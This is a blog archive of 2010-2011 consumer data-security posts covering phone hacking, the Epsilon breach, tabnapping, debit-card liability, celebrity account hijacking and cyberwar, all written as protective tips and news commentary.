Archive for the ‘Data security’ Category

« Older Entries

Is Your Smartphone Safe From Hackers?

Monday, July 25th, 2011

With the recent phone-hacking crisis at News Corporation and the emotional testimony of the company’s top executives including Chairman Rupert Murdoch, now might be a good time to do what you can to secure your own cellphone whether it is a  smartphone or not.

Analysts at Gartner estimate that one in six people now own or have access to a smartphone. The importance of protecting and maintaining the integrity and privacy of both your personal and business data cannot be overstated. Once it’s gone, your data takes on a new life of its own on the worldwide underground  black market.

The variety of ways we engage with and consume online entertainment and information has changed in just the past two years, thanks to the demand for and availability of a torrent of on-demand mobile content.

While  the good guys work to develop new feature-rich applications for us to consume, the bad guys are just as busy trying to gain access for a number of reasons:

  • Financial gain : Money transfer by phone is becoming popular. This means that money can be taken from your account and transferred into another by SMS.  Phone hacking gurus can spy and get information required to initiate transactions from your phone.
  • Spying on you: Hackers can also gain access and take over your cell phone for the purpose of spying and remote mobile phone hacking. Once secured, the hacker can actually command your phone to call him. He can then listen to all conversations going on around the owner of the phone.
  • Access your private information: And as noted earlier, phone hackers want to keep ahead of others by gossiping in clandestine underground chat-rooms and bargaining for stolen data on the black market.

The iPhone was the early entry into the smartphone market with it’s user-friendly features and touchscreen capability. Even the release of the phone was interrupted by hackers that sent spam messages promising  non-existent free phones to an eager buying public. The hackers succeeded in upstaging Steve Jobs prior to the public release of the phone.

Google’s Android has tried to keep up with the sales of the more popular iPhone, but Android’s OS is also vulnerable to attack and vulnerabilities. Windows Phone 7 and RIM’s Blackberry round off the list of the largest smartphone operating systems and both systems have their own set of potential security vulnerabilities. Keeping on top of the latest scams remains vital for protection from the latest threats.

What steps can you take?

Here are some password and prevention tips to reduce your chances of being phone hacked:

1. Turn on the password protection for your voice mail
2. Never use the same password for more than one account
3. Change your phone’s default passwords (Thanks to Piers Morgan)
4. Avoid easy passwords,  e.g: your birth year (Easily found on your Facebook page?)
5. Change your phone’s password on a regular basis
6. Passwords with eight or more characters work best
7. Delete your voice mail after you’ve listened to it
8. Consult your carrier for their unique and regularly updated platform protection solutions

The growing numbers of hackers generally work for a combination of fun, notoriety and/or financial gain. Parents should use extra care when considering the degree of digital freedom and internet access they allow their children to have, based on personal parental standards. Phones with a camera and web access are usually equipped with parental privacy controls.

Which strategies are you implementing to slow the hack-attackers down?

Posted in Data security, Smartphones | No Comments »

Man’s Stolen MacBook Phones Home

Thursday, June 2nd, 2011

As summertime travel approaches, now is a great time for me to remind you to mind your personal electronic portables. According to Gartner, one in six people now have access to a high-tech mobile device, and odds are high that someone has their eyes on your stuff.

A creepy laptop thief hoping to snag some free electronic swag, got way more than he bargained for recently.

The Associated Press reported this week that an Oakland, California man had his apartment burglarized and his MacBook stolen. The good news is that he got it back thanks to an online, viral, one-man crusade. Local police were swamped and unable to assist, so Joshua Kaufman took matters into his own hands. After posting photos of the stranger on Twitter and creating a blog titled “This Guy Has My MacBook”, sweet justice got served.

Kaufman stated: “People who followed me on Twitter retweeted it. It got picked up by social media and the press. It went super viral,” he said. On the same day that he posted his website on Twitter, police came calling.

WVEC in Norfolk, Virginia published a report on their site:

“Kaufman’s case is the latest example of people, not police, using technological tools to help find their own stolen property such as cars, cell phones and digital cameras. Kaufman had just moved to a new apartment in Oakland when a burglar broke in, taking the laptop, a bag, an electronic book reader, and a bottle of gin on March 21. He activated theft-tracking software he had installed, which began sending photos taken by the computer’s built-in camera of the unauthorized user three days later.”

Luckily for Kaufman, the security software he had installed but never tested, began sending grainy photos from the device’s camera to his inbox. The victim observed the thief, posted his photo on the web and voila! After the photos went viral and caught the attention of the media, law enforcement went to work on the case and nabbed the thief.

Many devices equipped with mobile web and geo-tagging technology are literally equipped to “phone home” when properly outfitted with security software.

One of my kids recently went on vacation and left an iPhone in the hotel room upon check-out. A land line call to the hotel got the usual response: “We’re sorry, but your room has been cleaned and no iPhone was turned in.”  From this point the conversation went something like this: “Really? My phone’s tracking locator says the phone is still there, I can see it online!”

Three minutes later, the hotel called back (they never call back) with the good news that the phone had just been located. How do you put a value on that sort of electronic sleuthing capability? ET phoned home alright. Truth is sometimes stranger than science-fiction.


 

Posted in Computer safety, Data security, GPS Tracking | No Comments »

3 Things To Learn About Your Debit Card

Thursday, May 19th, 2011

The recent security breach at arts-and-crafts retailer Michaels Stores, calls much needed attention to debit cards and their vulnerabilities. In this breach, the thieves not only stole debit card numbers, they actually used them to swipe money from the victims’ bank accounts.

We often consider debit cards a convenient alternative to their look-alike payment tool, the credit card. What many of us fail to remember is that the theft of debit card resources, robs us of our own money and not the bank’s money. Fortunately, there are protections and guidelines in place for victims of debit card scams, but the key lies in understanding the extent of our responsibility for reporting a problem.

Although most debit card issuers offer a brief grace period for reporting a lost, stolen or compromised card, we have specific obligations to our bank that could mean the difference between the protection or the loss of our assets.

According to Bankrate.com, not all debit card issuers play by the same rules:

“Federal law limits personal liability for unauthorized transactions to $50 for credit cards, but offers more limited fraud protection for debit cards. How to protect yourself: Find out if your bank offers theft and fraud protection. Get specific. Under what circumstances is it honored? How do you have to use the card? Whats your timetable for reporting the loss?”

Since each  financial institution varies, you need to know the following for any debit card you carry:

1. What are the specific written rules for my card? Get the rules in writing from your card issuer.

2. Lost, stolen or compromised cards require different time-sensitive responses from you. Get it in writing from your card issuer.

3. Failure to report a problem could result in the loss of all your money. Monitor your debit-card account at least monthly for any irregularities and promptly report them.

The rules above all point to you “promptly reporting” any concerns, though the definition of “prompt” varies. Again, get it in writing.

Jay Foley at the Identity Theft Resource Center reminds consumers to file a police report in the event of a suspicious transaction, which helps document the facts of  your case
for reimbursement with the bank.

By simply keeping a watchful eye on your card’s balances and activity no less than monthly, you can drift off to sleep at night without fear that someone might steal those sheep you’ve already counted.

Posted in Credit card fraud, Data security, Financial Scams, Identity Theft Protection | No Comments »

Global Spear-Phishing: A New Threat

Thursday, April 7th, 2011

While Charlie Sheen maniacally pronounces his  self induced “winning” status to a saddened, bewildered and exhausted fan base, another  growing menace actually seems poised for “winning”.

Consumers got a wake up call on two fronts with the disclosure of the massive Epsilon Interactive data breach last week.

Our  first wake up call stems from the sheer length of the  list of companies who utilize Epsilon’s email  service to reach their customers.

The second wake up call is the reality that so many trusted brands outsource our names and email addresses to a third party  email service provider (ESP)  who has now been exposed as functionally incapable of protecting the  private personal data that was entrusted to them.

The truth is that there is nothing you or I can do to prevent these leaks when the repository for our data is in the hands of other people.

According to the consumer advocacy group Cauce, the following  financial institutions were affected by the breach:

  • Ameriprise Financial
  • Barclays Bank of Delaware
  • Capital One
  • CITI
  • JP Morgan Chase
  • Moneygram
  • Scottrade
  • TD Ameritrade
  • TIAA-CREF
  • U.S. Bank
  • World Financial Network National Bank (Victoria’s Secret card)

The CAUCE report went on to explain:

“As well, these marketing and retail companies have reportedly had their client email, names and in some cases, other information stolen”:

  1. 1800Flowers.com
  2. AbeBooks (division of Amazon)
  3. Airmiles
  4. Beachbody
  5. Benefit Cosmetics
  6. Best Buy
  7. Best Buy Canada Reward Zone
  8. Brookstone
  9. City Market
  10. CollegeBoard
  11. Dillons
  12. Disney Destinations
  13. Eileen Fisher
  14. Ethan Allen
  15. Food 4 Less
  16. Fred Meyer
  17. Fry’s
  18. Hilton HHonors
  19. Home Shopping Network
  20. Jay C
  21. King Soopers
  22. Krogers
  23. Lacoste
  24. L.L. Bean credit card
  25. Marks and Spencer
  26. Marriott Rewards (Update: Marriottt confirmed NO points totals were taken)
  27. McKinsey Quarterly
  28. New York & Company
  29. QFC
  30. Ralphs
  31. Red Roof Inns
  32. Ritz-Carlton (Update: Ritz-Carlton confirmed NO points totals were taken)
  33. Robert Half
  34. Smith’s
  35. Soccer.com
  36. Target
  37. TiVo
  38. Verizon
  39. Viking River Cruises (unconfirmed)
  40. Walgreens (for the second time)

The impact of the Epsilon breach is expected to cause a sharp, severe and extended series of spear phishing attacks. These phishing attacks will  target and exploit the trusting relationship between the victimized brands and their clients.

It is estimated that tens of millions of people’s names and email addresses have been exposed as a result of this breach. In the past three days, our own household has received at least three notifications from worried banks and retailers.

Consumers should brace themselves for what could be a barrage of incoming phishing attempts, disguised as communication from a trusted vendor. Although most savvy internet users are aware of these ploys, now is a good time for a few timely reminders.

  • Consumers can report attempted phishing attacks to the U.S. Secret Service by emailing them at: phishing-report@uscert.gov
  • Never click on a link in an email, just type the web address into your browser yourself to avoid infectious malware.
  • Security expert Brian Krebs reported that over 100  ESP’s (email service providers) have been under attack by fraudsters in recent months. This is an ongoing, sustained effort to grab your information!
  • Gmail, Earthlink and Yahoo all provide tools to help fight spam and phishing attacks.

An ancient proverb comes to mind: ” Trust in the gods, but tie up  your camel anyway!”

 

Tags: , ,
Posted in Data Breaches, Data security, Financial Scams, Internet, Phishing | No Comments »

Ashton Kutcher Gets Punk’d on Twitter

Monday, March 7th, 2011

Have you ever wondered about  Ashton Kutcher’s rather warped sense of humor? The celebrity star of the hit TV show Punk’d was the victim of a deliberate hoax intended to warn the world,  embarrass the star and catch him off guard in a “practical joke” sort of way.  His popular,  high profile, widely read Twitter account got hacked!

The television show has been in re-runs  since the final episode aired in 2007.  The actor (AKA Mr. Demi Moore)  has always claimed that he is “un-punkable”. The basic premise of Punk’d is that an unwitting celebrity is filmed during a staged prank, solely for the entertainment of viewers.

Here’s what happened. Ashton Kutcher has 6.4 million followers on Twitter. A relatively “friendly” hacker compromised the account while Kutcher was attending  a TED speakers conference in Long Beach, California.

According to the Internet Security Firm Sophos, the uninvited visitor’s hijacked message was sent out to Kutcher’s 6.4  million followers. The message stated:

"Ashton, you've been Punk'd. This account is not secure. Dude, where's my SSL?"

Security analysts like those at the security firm Sophos, believe that the hacker exploited the account’s lack of SSL encryption.

A Sophos analyst went on to say:

The insecure Twitter and Facebook accounts of some celebrities offer a very tempting target for cybercriminals who may wish to spread their dangerous or spammy links to millions of followers. We should just be grateful that on this occasion the hack appears to have taken place to promote better awareness of the need for better security, rather than with more malicious intent.”

Relatively unsophisticated tricks like these can easily steal or “sidejack” the credentials of anyone using an unsecured WiFi network (Starbucks anyone?)

This should get Hollywood’s attention. I smell the winning recipe for a new fall TV show in the making. Surely reality television has room for another crowd pleaser.

Lets call the new hit series…… Hack’d!

Tags: ,
Posted in Data security, Personal privacy, Uncategorized | No Comments »

“Trolls” Attack Rahm Emanuel’s iPad

Thursday, January 20th, 2011

Internet trolls are lurking in our midst.

Think your iPad is safe from hackers? Think again.

Charges have been filed against a pair of self-described Internet “trolls” who claim responsibility for hacking into AT&T’s servers last summer.

New Jersey District Attorney Paul Fishman has filed charges against two computer hackers who are charged with exposing  over 120,000 names and email addresses.

“The hallmark of this criminal hacker subculture is malicious one-upmanship,” Fishman added. “The more their victims have to scramble to fix the holes and the bigger the humiliation in reputational and actual damage to the corporate victim, the more bragging rights these individuals have in their own community.”

Many of the victims in this case are well known  politicians,  entertainers, and business leaders. Some of the more prominent victims include former White House Chief of Staff Rahm Emanuel, New York Mayor Michael Bloomberg, and ABC News anchor Diane Sawyer.

The “trolls”  bragged about their exploits in order to gain notoriety and street cred, prompting officials to charge them with fraud and conspiracy.

Because consumers have no direct control over the network security of their vendors, remember these tips:

  • Seek, read, print and safely store the privacy notices of your all your electronic and financial service providers.
  • Keep on guard for irregularities on all your monthly statements.
  • Regularly review your free credit report  several times per year at http://www.annualcreditreport.com

The volatile combination of hackers, organized crime, thrill seekers, and technology trolls have morphed into the next generation of  Dorothy’s lions and tigers and bears….oh my!

Tags: , ,
Posted in Data Breaches, Data security | No Comments »

Three Privacy Reminders For 2011

Wednesday, January 5th, 2011

Exhale. With the worst of the financial storms past us, we can finally breathe and begin to rebuild our financial fortifications.

One of the first pieces of business this year should be to put a few strategies in place to protect whats left of your assets and personal privacy. Unfortunately, the fraudsters are still in the game stronger than ever before, due to the relatively risk-free nature of modern financial crime.

The reality is that most financial crimes are under-reported and left unsolved due to a scarcity of investigative resources and the endless supply of fresh target information available to most criminals.

Here are three areas to watch in 2011 according to Bank Info Security:

1. Mobile Banking Risks

“Mobile phones used for banking are on the rise, but mobile security is proving increasingly challenging for banks and credit unions, as controls put in place to protect traditional online banking do not translate well when applied to mobile. Mobile banking applications from Bank of America, Chase, Wells Fargo and TD Ameritrade have all suffered from security flaws, and CitiGroup in 2009 noted vulnerabilities when it learned some banking apps stored sensitive user details in hidden files on smart phones.”

2. Social Networks and Web 2.0

“The connection between mobile phones and social media is growing, with Twitter and Facebook apps offered for mobile users. Institutions embracing mobile also are embracing social networking, says Rasmussen, Internet Identity’s chief technology officer. “With more banks on social networks, expect to see more fake sites using social networks, like Twitter and Facebook, to try and trick people into giving up vital personal information,” including banking login credentials and Social Security numbers, he says.”

3. Malware, Botnets and DDoS Attacks

“Distributed denial-of-service, or DDoS, attacks, as seen in the wake of the recent WikiLeaks incidents, are likely to increase. In fact, the WikiLeaks-inspired attacks against leading e-commerce sites have fueled interest among fraudsters, says RSA’s Rivner. Botnet operators now see opportunity for additional income.”

Smart phones, social networking and sustained attacks on closed systems, leave plenty of room for mischief in the coming year. Stay tuned for ways to short-circuit these uninvited cyber-guests in 2011 and beyond.

Tags: , , , ,
Posted in Cyberwar, Data security, Personal privacy | No Comments »

The New Face of Phishing

Tuesday, August 17th, 2010

In the past six months,  a dangerous new threat has emerged in the world of internet phishing. Many of us have often laughed at the crude and poorly crafted phishing explorations that often invade our in-box.

Lest any of us fall asleep at the wheel thinking we are already hip to the rather primitive  phishing tactics of the past, this one could easily  catch you in it’s insidious hooks if you don’t read on.

Known as “tabnapping”, this ploy is designed to psych you out with a behind-the-back switcheroo that literally kidnaps  open tabs and catches most savvy observers by surprise. Using an almost invisible layer of embedded JavaScript, here’s how it works.

Brian Krebs explains:

” As Mozilla Firefox creative lead Aza Raskin describes it, the attack is as elegant as it is simple: A user has multiple tabs open, and surfs to a site that uses special javacript code to silently alter the contents of a tabbed page along with the information displayed on the tab itself, so that when the user switches back to that tab it appears to be the login page for a site the user normally visits.”

In as little as five seconds, a tabbed page silently and almost invisibly changes to a seemingly familiar page (including the cute little “favicon” in the address bar) which requires you to re-enter your log-in credentials. As soon as you enter your private details,  both you and your personal information  have literally been “had”.

The best defense against this tricky new tactic is to take a time-out. What that means is whenever a site you visit “times-out” , you should take some time-out of your browsing frenzy to open a new tab and re-enter the desired URL yourself.

Most browsers including Safari, Chrome,  Firefox and Internet Explorer claim to be on the lookout for you by blocking tabnapping attack code. Researchers and hackers have both been able to sidestep many of the current blocking protections,  leaving most browsers vulnerable.

Safety dictates that you don’t log in on any tab that you  have not opened yourself. Get into the habit of opening fresh tabs whenever you enter a user-name or password.

If you forget to refresh previously opened and familiar log in pages, one day soon you could literally open up a fresh can of worms.

Posted in Data security, Financial Scams, Internet, Phishing | 2 Comments »

ID Theft Is Lurking In Your Computer

Monday, June 7th, 2010

Personal computing guru Steve Bass recently shared some rather eye-opening statistics in his value-packed newsletter,  Techbite.

Security vendor PC Pitstop Research analyzed just over 50, 000 computers for evidence of security threats, vulnerabilities, viruses and protection tools. Immediately, some interesting results emerged.

Can you guess what percentage of computer users have absolutely no security software installed on their machines? The answer is that a shocking 23% of us are flying through cyberspace as naked as  jay birds!

The PC Pitstop  study was looking for evidence of threats which we should all be on the lookout for such as Spyware, Malware / Rogueware and Keyloggers.

For clarity, the article defined its terms,  so there would be  no confusion about the nature or intent of each of these threats.

According to the report:

” We define spyware as the software that is unintentionally installed on the target computer. … A new growing segment of malware is rogue or phony security software.… Keyloggers are a category of software that is intended to monitor the activity of a target computer. This is a rather dangerous category since this form of malware can be used for identity theft, stalking and other ugly criminal activity.”

The good news is that Symantec, Trend Micro, Kaspersky and other leading providers are very effective in their own areas of strength,  at delivering protection from many of the most common  threats:

  • Kaspersky was rated best against rogue software
  • Symantec was best in the fight against spyware
  • Trend Micro was best against keyloggers
  • Kaspersky was best against viruses

One of the takeaways here is that not all threats can be stopped with just one form of security. Redundancy in various computer security software programs is the best way to keep the multiplying strains of threats at bay.

The underlying theme from this study is that ” no one security provider is good at protecting against all aspects of security. As the analysis suggests, each vendor has some strengths and weaknesses.”

The reality that a given threat could progress  from mischievous to menacing to malicious, is a real possibility in our data-rich daily lives.

Protect your data and assets accordingly.

Posted in Anti-virus software, Computer safety, Data security, Personal privacy | No Comments »

Cyber Battlefield In Our Own Backyard

Thursday, May 6th, 2010

With the war in Iraq winding down and the war in Afghanistan heating up, many of us are unaware of the cyber-war raging on our own home turf.  If this is old news to you, stay with me.

According to a Congressional committee, attacks on the Department of Defense computer systems jumped 60 percent in 2009.

Russia, China and North Korea have all launched sustained attacks on U.S. government agencies including the Federal Trade Commission and the Department of the Treasury.

Analysts believe that security standards like the ones created by the National Institute of Standards and Technology (NIST), should be implemented immediately. According to the experts, NIST could get us 90 percent closer to where we need to be.

In Congressional testimony earlier this year, former National Intelligence Director Mike McConnell said that we could be on the brink of an all-out cyberwar. McConnell’s view has been repudiated by the current Secretary of Defense Robert Gates.

If  Moore’s law is true,  (every 24 months a dollar buys twice the amount of computing power that it did before) our enemies may be able to buy, beg, borrow or hack twice as much of our data as  they can today for the same effort.

Computer scientist Daniel Geer Jr. aptly reveals what is at stake:

” We have spent centuries learning about securing the physical world, plus a few years learning about securing the digital world. What we know to be common to both is this: That which cannot be tolerated must be prevented.”

America’s most valued, electronically stored data is being targeted. Government agencies, private think tanks and university data warehouses are all vulnerable. The enemy operates from a distance with virtually no risk of personal danger.

What defense mechanisms can we construct to prevent our data from being stolen at the speed of light?

Tags: ,
Posted in Cyberwar, Data security | No Comments »

« Older Entries